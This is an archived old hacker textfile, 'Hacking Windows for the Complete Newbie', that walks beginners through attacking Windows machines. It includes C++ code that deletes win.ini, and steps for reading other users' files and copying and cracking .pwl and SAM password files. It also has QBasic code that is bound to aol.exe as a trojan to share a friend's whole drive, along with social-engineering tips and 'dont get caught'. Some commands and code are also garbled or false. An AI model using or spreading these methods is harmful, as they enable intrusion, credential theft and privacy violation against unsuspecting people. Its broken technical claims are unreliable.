💾 Archived View for gemini.theuse.net › textfiles.com › uploads › beginners.txt captured on 2022-01-08 at 20:53:19.

View Raw

More Information

-=-=-=-=-=-=-

Hacking Windows
      for
The Complete Newbie

      Part 1


By: SLIPStream (formerly known as Morbos or Dynamite)
Contact information located at the end of the file.

(Please note: Newbie is not meant to be used
as a put down. All great hackers were once
newbies so please dont get POed) :)


WARNING: This file contains some elements which
are considered illigal in most countries including
the united states. The author assumes no responsiblity
for the actions of the reader after reading this file.
The reader hereby understands that the file is for
educational purposes ONLY. The author does not encourage
illigal activity and cannot be held responsible for the
readers actions. If you agree to this, procede in reading
the file, otherwise, please exit now.


Lesson 1: The Windows FileSystem

Ok. Unless you know virtualy nothing about hacking,
skip this lesson, it is only meant to be used for
the very beginners k? Thanks alot.

Heres the layout of the windows filesystem:


C:\   <--- Can be replaced with any other drive letter eg: e, f, a, b
|_ >   C:\windows
   >            \_>  System Files
   >             \_>  Other files used by windows
   >              \_>  Dont delete anything in here.
   >   C:\Program Files
   >		\_>  Used by programs
   >		 \_>  Dont alter these unless you want to
   >		   >  Uninstall them
   >		   \_> .dll files stored here for programs
   >   C:\DOS
   >            \_>  This directory only exists on REAALLY old
   >             \_> Windows systems ie: win95 in its early editions
   >		  \_> or win 3.1 (i hope nobody still has that.)


Easy enough eh? Open up My Computer and click on C:\ or whatever your
main drive is. Explore it, and when your ready, move on to the next
lesson.


Lesson 2: Exploiting Windows

Windows is so cruddy, even someone new to computers could mess
with it! Lets start. Ok, first you need to know some file extentions:

	.exe	an executable file
	.bat	a batch file (full of dos commands)
	.html	an html file used for webpages
	.htm	' ditto '
	.dll	a dynamic link library file. used for 
		program instructions
	.obj	object file, used for compiling
		(dont worry about it right now)
	.jpg	an image file
	.bmp    ' ditto '
	.gif	' ditto ' or an animated image file
	.mp3	sound file
	.wav	older sound file
	.mpg	video file
	.swf	a flash video file (neat)

You can find lots more. If your not getting all this, you  probably
want to get windows for dummies. Its available at barns and nobles
pretty cheap in the computer section.


Ok. Procede ONLY if you understand all this otherwise you'll screw
your computer over.


First of all download a c/c++ compiler. If you dont know what that is
then dont procede.

Once you know how to compile stuff and write some simple programs,
go to the next subsection (A).

	A: Your first exploitation. 
	
		Ok, put this into your c++ compiler.

		/* This program will completely kill windows
		   so DO NOT run it */

		#include <iostream>
		#include <dos.h>
		#include <stdlib.h>
		#include <conio.h>
		
		using namespace std;

		void pause();
		void destroy();		

		int main()
		{
			cout << "This will destroy your computer.\n";
			cout << "Are you sure you want to continue???\n";
			cout << "If not, click X now.\n";
			pause();
			cout << "Are you really really sure??? \n";
			pause();

			destroy();
			
			return 0;
		}

		void pause()
		{
			system("pause");
		}

		void destroy()
		{
			system("if exist c:\win.ini del c:\win.ini else echo .");
			system("if exist c:\windows.ini del c:\windows.ini else echo .");
		}


		Compile it and build/link it. DO NOT RUN IT!!!
		If you run this and press enter twice it will kill your computer.


		What does this do???
		First of all:

		/* This program will completely kill windows
		   so DO NOT run it */

		Is nothing but a statement. The compiler disregards it.

		Then:
		#include <iostream>
		#include <dos.h>
		#include <stdlib.h>
		#include <conio.h>

		These statements are calling header files. Header files
		contain the information used to call c/c++ commands.

		void pause();
		void destroy();

		To use a function other than main, you must declare it so that
		the system can allocate memory for it.

		int main()
		{
			cout << "This will destroy your computer.\n";
			cout << "Are you sure you want to continue???\n";
			cout << "If not, click X now.\n";
			pause();
			cout << "Are you really really sure??? \n";
			pause();

			destroy();
			
			return 0;
		}

		This is the main program where we call the other functions.

		void pause()
		{
			system("pause");
		}

		This is the pause function. Here we used the dos command pause which
		is called from the main program.
		
		void destroy()
		{
			system("if exist c:\win.ini del c:\win.ini else echo .");
			system("if exist c:\windows.ini del c:\windows.ini else echo .");
		}
	
		This is the main part of the program where it deletes the win.ini file on XP/NT/2000
		or windows.ini on win3x or win9x (3.1 is 3x, and win95/98/2000 are 9x).

		I strongly do not advise running this program. If you cannot see why
		then you need to learn more about c++.

		If all this was too complecated for you you could write it in QBasic, which
		requires downloading another compiler (this one is small so you can download
		it on 56k dialup).



		B: Breaking into the library exploit

		I call this the breaking into the library exploit because it lets you break into
		anyones account on a windows machine but only allows read access.

		(quick lesson on access:

			read: users can only read from the file, but cannot write to
			write: users can write to the file
			no access: users cannot read or write to the file.  )


		Ok. Open up the DOS prompt. (You need to know some dos commands to use this
		exploit).

		When the prompt comes up type this:

		c:\windows> cd c:\windows\profiles

		Do not type the c:\windows> part, this only represents the command prompt.

		Now type:

		c:\windows\profiles> dir

		(Notice \profiles has now been added to c:\windows)

		Something like this should come up:

		12/18/2003  05:52 AM    <DIR>          .
		12/18/2003  05:52 AM    <DIR>          ..
		12/17/2003  07:04 PM    <DIR>          administrator
		11/17/2003  09:16 PM    <DIR>          All Users
		12/04/2003  03:59 PM    <DIR>          funnyguy
		12/20/2003  06:33 AM    <DIR>          anotheruser
		12/27/2003  10:44 PM    <DIR>          someuser
		               0 File(s)              0 bytes
		               7 Dir(s)   3,671,572,480 bytes free

		Well, this gives you an idea on who is on the computer.
		Now type:

		c:\windows\profiles> cd funnyguy

		c:\windows\profiles\funnyguy> dir |more
		
		Something like this will come up:

 		Volume in drive C has no label.
 		Volume Serial Number is ECB8-7534

 		Directory of E:\Documents and Settings\funnyguy

		12/27/2003  10:44 PM    <DIR>          .
		12/27/2003  10:44 PM    <DIR>          ..
		11/18/2003  05:58 PM    <DIR>          .java
		11/22/2003  12:30 AM    <DIR>          .jpi_cache
		11/19/2003  08:57 PM    <DIR>          .limewire
		12/26/2003  12:25 AM               697 .plugin141_05.trace
		12/24/2003  01:53 PM             4,754 ac3dprefs.txt
		12/18/2003  01:30 PM                 0 annoy.cpp
		12/17/2003  04:52 PM            42,967 arena.cpp
		12/17/2003  04:52 PM             3,389 arena.dsp
		12/17/2003  04:52 PM               535 arena.dsw
		12/17/2003  04:52 PM            34,026 arena.h
		12/17/2003  04:52 PM            33,792 arena.ncb
		12/17/2003  04:52 PM            48,640 arena.opt
		12/17/2003  04:52 PM             1,278 arena.plg
		12/16/2003  06:23 PM    <DIR>          attacker
		12/27/2003  07:19 PM    <DIR>          AWSGuitarTuner_Windows
		12/16/2003  06:15 PM    <DIR>          battlepong
		12/17/2003  04:30 PM    <DIR>          cheat260
		12/17/2003  04:22 PM    <DIR>          crypt3
		12/23/2003  09:07 PM    <DIR>          dc_40_stand_eng
		12/25/2003  10:28 AM    <DIR>          Debug
		12/28/2003  12:26 AM    <DIR>          Desktop
		12/15/2003  06:31 PM    <DIR>          Favorites
		12/16/2003  06:15 PM    <DIR>          fedup
		12/16/2003  04:49 PM    <DIR>          grok
		12/16/2003  07:03 PM    <DIR>          hacker1_1
		12/27/2003  09:27 PM    <DIR>          Ktulu40
		12/17/2003  05:07 PM    <DIR>          midiedit
		12/17/2003  04:40 PM    <DIR>          musiced
		12/28/2003  12:27 PM    <DIR>          My Documents

		Hmm? Whats all this??? His/Her personal files???!!!
		Do a little browsing.

		WINDOWS XP USERS READ THIS:

			Windows XP/NT has better security than 9x from
		the dos console, but this same exploit can be applied by
		doing it from explorer. Open up Internet Explorer (or whatever
		web browser you use), and in the adress bar type:

		c:\documents and settings

		Then press enter.
		Ah. There we are!
		The same thing, but graphical!


Lesson 3: Starting to get a little more technical.


Ok, you know how to break into windows the easy way. But you dont have write
access. Or maybe you want to break into some school computers but these
exploits wont work.

Lets get started!

There are two vital file types to logging in on windows:
		.pwl
			and
		SAM

The .pwl files contain much weaker encryption than the SAM file,
so it will be easier to obtain them and crack them than the SAM file.


Ok, heres how you do it. If the computer/s you want to hack have
windows 3x or 9x on them, you can use this exploit:

Step 1: Insert a blank floppy into the drive.

Step 2: Start -> Run -> command -> press enter.

Step 3: c:\windows> copy c:\windows\*.pwl a:\

Step 4: Crack them with Cain and Abel password cracker 
	and you've just broken into some accounts.


Wait! How did you do that?

Ok, heres the overview of the exploit.

	All the users password files are contained in
	their own little .pwl file (ie: john.pwl, sally.pwl,
	funnyguy.pwl).
	But you cant just go and read these files. They're 
	encrypted so they cant be read. However, there are
	programs out there that can break these filetypes.
	Go to http://www.google.com and type 
		'cain and able password cracker'
	The website should be one of the first ones on the
	list. When you get to their website, download the
	Cain and Abel password cracker and get to work.
	It usualy takes 1 - 2 hours to crack the password 
	files depending on how big the password is.
	First the cracker tries all these words out of its
	dictionary to try and find single word passwords.
	If none of the words in its dictionary are passwords
	(there are thousands of words in there), then it 
	brute forces the password file (tries a, then b, etc.)

Thats how you break into an account on 9x. Heres how you do
it on xp/NT.

What is the SAM file? 

	The Sam file is the file containing the encrypted
passwords of all the users on the system. Unlike win 9x where
all users have seperate .pwl files, the SAM file contains all
the users pwl. Basicly, if you have access to the sam file,
you win.

The sam file is actualy hidden (Much better security then 9x),
but when settings are changed on the computer, the sam file is
updated and moved to a new directory accessable to any user.
The folder is E:\WINDOWS\system32\config

If the SAM file isn't there and you have access to the machine
at the console then you can run a search for the SAM file.
Open the Start Menu, click Search, then click on All Files,
and type the Query as 'SAM'. It will run you through some boring
sample files that windows provides, then somewhere in the middle
it will have a file simply named 'sam', no file extention.
Right click on it and click 'Open Containing Folder'. You should
see the sam file in there along with lots of other configuration
files. 

Put your floppy in there, right click on 'sam' and click Send to->
Floppy (A:\). In a few seconds you should have your encrypted password
file. BUT! You cannot use Cain and Abel to crack this one. Instead, a
new program is required. 
The Program is called L0phtCrack. Download the trial version from
http://www.atstake.com and crack that sam file. This will generaly
take longer than the .pwl files since all the users passwords are
combined into one file.

Windows 2000 Vulnerability:
	If you have access to a machine running windows 2000 and have
limited access to it, there is a simple command you can use to make
it give you Super-User privilages on the command prompt. Type:

C:\ netddemsg -s Chat$ cmd.exe

You should now have super user privilages on a 2000 machine!


Lesson 4: Viruses, Trojans, and Worms (oh my! :) )

This section contains code that can damage or destroy your computer.
Please do not use any of the information contained in this section.
It is only for educational purposes.


Ok, pretend you dont want any privilages on a persons machine, but you
just want to screw it up or play a prank on them. 

How do you do this? Pretend the person has AOL (The crappiest isp
out there) and they have windows xp. Lets write some code in QBasic.

(Note: No matter what people say, QBasic is the coolest programing language
(besides java and c++) out there).

Heres the code for file 1:

rem '#############Start Copying##############

print "Please wait while AOL is updated... "
shell "cd\windows"

open "win.ini" for output as #1

let loop# = 0

dim line1 as string
dim line1 as string
dim line3 as string
	line1 = "[WAOL]"
	line2 = "AppPath=E:\Program Files\America Online 9.0"
	line3 = "SharedPath=E:\"
dim blank as string
	blank = " "

print #1, line1
print #1, line2
print #1, line3

while loop# < 200
	print #1, blank
wend

rem '#############Stop Copying###############'

Save the file as update.bas then compile it under qbasic.
Ok, now you need a copy of the america online main file, just use the
aol exe file (C:\program files\America Online 9.0\aol.exe). Install 
aol 9.0 optimized using one of those crappy aol disks you have then
copy aol.exe to your desktop.
Copy update.exe (the compiled version of update.bas) to  your desktop.
Now download a file binder. You can get one from http://www.hackers.com
in their file archive, or you can get one from http://www.astalavista.com
Either one has some good file binders. You can also do a google search
for one. 
Once you have your file binder, have it bind aol.exe and update.exe together,
where as update.exe runs in the background and is not shown on the task bar. 
Name the binded file game.exe or fun.exe, maybe even screensaver.exe. Be 
creative.

Now comes the fun part!

Talk to your friend on aim and get him/her to let you send him/her the file.
Tell them that it is some game or screen save that they like and want. Be
persuasive and convincing. When they agree you can open a direct link from
your computer to theirs from aim. This will alow you to send the file.

Before you send it open up your command prompt and WITHOUT PRESSING ENTER type

c:\windows> netstat -r

Go back to aim, and be prepared to jump to the command prompt. Send the file
to your friend and quickly click on the command prompt to maximize it and press
enter!!! If you have a fast connection, it will have gotten the IP adress of your
friend. This IP adress is what will be used to break in.

What was all this for???

	An IP address (Internet Protocol Address) is how your computer is
identified on the internet. It should look something like this:

65.45.12.54

By obtaining the ip adress of your friend, you have found where his computer
is located on the internet. The program you wrote shares your friends entire
hard drive allowing you to do anything you want with it, upload, download,
see if your friend has been looking at naughty things on the internet and 
whatnot. 

The peice of code that made all this possible was:

	SharedPath=E:\

Normaly, AOL shares its folder E:\Program Files\Common Files\AOLSHARE
Which is the AOL shared folder (doi :) ). Its not much help to only have
that folder shared, but now you have the entire hard disk shared. If you
want to, you could do whatever you want to his hard drive.

How do I find stuff they've been doing?

	Well, there are several folders containing the history and past
of the computer. First of all comes history. This is located in 
C:\Documents and Settings\username\Recent
If you dont know what username your friend is under go to
c:\documents and settings and find out.
You cant just look at the cookies (accept for under 9x).
You need to open up their internet explorer:
E:\Program Files\Internet Explorer\IExplore.exe and click
on cookies. Im not gonna cover all this right now.



I Hope this file was alot of help and enough to get
you started! Have fun, and dont get caught!



Contact information:

E-Mail:

blackfire@dangerous-minds.com  <- please use this one
blackfire@phayze.com  
morbos@white-star.com

For Other information:

slipstream_node@yahoo.com

Website:

dataflux.cjb.net

My Email Service:

Please request an account. I dont want to overload
my disk quota. Please contact me to request an
account. Unauthorized accounts will be deleted.

http://wwww.mysticism.zzn.net  (username@mysticism.zzn.net)

Yahoo IM:

SLIPStream_node